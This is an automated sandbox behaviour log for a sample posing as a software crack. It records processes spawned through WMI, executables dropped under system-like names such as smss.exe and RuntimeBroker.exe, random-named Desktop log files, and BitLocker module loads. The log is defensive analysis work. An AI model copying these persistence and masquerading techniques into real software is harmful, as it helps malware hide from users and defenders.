Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: version.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: ktmw32.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: winnsi.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: rasapi32.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: rasman.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: rtutils.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: propsys.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: dlnashext.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: wpdshext.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: edputil.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: appresolver.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: sppc.dll
Source: C:\Program Files\Windows NT\smss.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Directory created: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Directory created: C:\Program Files\Windows Sidebar\Gadgets\9e8d7a4ca61bd9	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Directory created: C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Directory created: C:\Program Files\WindowsPowerShell\0a62118e203df5	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Directory created: C:\Program Files\Windows NT\smss.exe	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Directory created: C:\Program Files\Windows NT\69ddcba757bf72	Jump to behavior

Source: NursultanAlphaCrack.bat.exe

Static file information: File size 2866940 > 1048576

Source: NursultanAlphaCrack.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: NursultanAlphaCrack.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: NursultanAlphaCrack.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: NursultanAlphaCrack.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: NursultanAlphaCrack.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: NursultanAlphaCrack.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: NursultanAlphaCrack.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: NursultanAlphaCrack.bat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: NursultanAlphaCrack.bat.exe
Source:	Binary string: 5c561934e089\System.pdb source: smss.exe, 00000032.00000002.2216710248.000000001BED2000.00000004.00000020.00020000.00000000.sdmp

Source: NursultanAlphaCrack.bat.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: NursultanAlphaCrack.bat.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: NursultanAlphaCrack.bat.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: NursultanAlphaCrack.bat.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: NursultanAlphaCrack.bat.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

File created: C:\portsurrogateFontCrt\__tmp_rar_sfx_access_check_4596984

Jump to behavior

Source: NursultanAlphaCrack.bat.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001DF640 push ecx; ret	0_2_001DF653
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001DEB78 push eax; ret	0_2_001DEB96
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Code function: 5_2_00007FF887D74B69 push ecx; retf	5_2_00007FF887D74B72
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Code function: 5_2_00007FF887D74342 push edx; ret	5_2_00007FF887D74343
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Code function: 5_2_00007FF887D701CD pushad ; iretd	5_2_00007FF887D70286
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Code function: 5_2_00007FF887ED2EC9 push edi; iretd	5_2_00007FF887ED2ECB
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Code function: 5_2_00007FF887ED1C66 push edi; iretd	5_2_00007FF887ED1C68
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Code function: 5_2_00007FF888154557 push eax; retf	5_2_00007FF888154791
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887D86878 push edx; iretd	50_2_00007FF887D8687B
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887D8942C push edx; ret	50_2_00007FF887D8942D
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887D95BF5 pushad ; retf	50_2_00007FF887D95BFD
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887D98123 push ebx; ret	50_2_00007FF887D9816A
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887DA7948 push ebx; retf	50_2_00007FF887DA796A
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887D74B69 push ecx; retf	50_2_00007FF887D74B72
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887D74342 push edx; ret	50_2_00007FF887D74343
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887D701CD pushad ; iretd	50_2_00007FF887D70286
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887ED2EC9 push edi; iretd	50_2_00007FF887ED2ECB
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887ED1C66 push edi; iretd	50_2_00007FF887ED1C68
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF888154557 push eax; retf	50_2_00007FF888154791
Source: C:\Program Files\Windows NT\smss.exe	Code function: 55_2_00007FF887D54B69 push ecx; retf	55_2_00007FF887D54B72
Source: C:\Program Files\Windows NT\smss.exe	Code function: 55_2_00007FF887D54342 push edx; ret	55_2_00007FF887D54343

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with benign system names

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe

File created: C:\Program Files\Windows NT\smss.exe

Jump to dropped file

Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\BwtLSSWj.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Program Files\Windows NT\smss.exe	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\wSzMZIas.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\USBzXUek.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\DYilKdVO.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\gDHycgoN.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\Rfxshdov.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\OfbStevG.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\rEjFTmFn.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\JRLLnIaC.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\medFrqzz.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\VlKreyqd.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\qmbOMItv.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\EErUokRe.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\ssnNFABl.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\sXGeTWEn.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\ZFTyARuY.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\BOAdhoQl.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\oCwXyDAs.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\uQMeEZWw.log	Jump to dropped file
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	File created: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\lhCxVqkE.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\BAOTDPUV.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\kHvGrYKy.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\ZTFIdpqp.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\npqXqOLK.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\JDNtgNEK.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\blWilNVX.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\rfhNxLLD.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Jump to dropped file

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\ZFTyARuY.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\JDNtgNEK.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\qmbOMItv.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\gDHycgoN.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\lhCxVqkE.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\medFrqzz.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\USBzXUek.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\BAOTDPUV.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File created: C:\Users\user\Desktop\sXGeTWEn.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\Rfxshdov.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\ssnNFABl.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\blWilNVX.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\oCwXyDAs.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\VlKreyqd.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\DYilKdVO.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\kHvGrYKy.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\JRLLnIaC.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File created: C:\Users\user\Desktop\rEjFTmFn.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\BwtLSSWj.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\EErUokRe.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\uQMeEZWw.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\BOAdhoQl.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\rfhNxLLD.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\ZTFIdpqp.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\OfbStevG.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\wSzMZIas.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	File created: C:\Users\user\Desktop\npqXqOLK.log	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
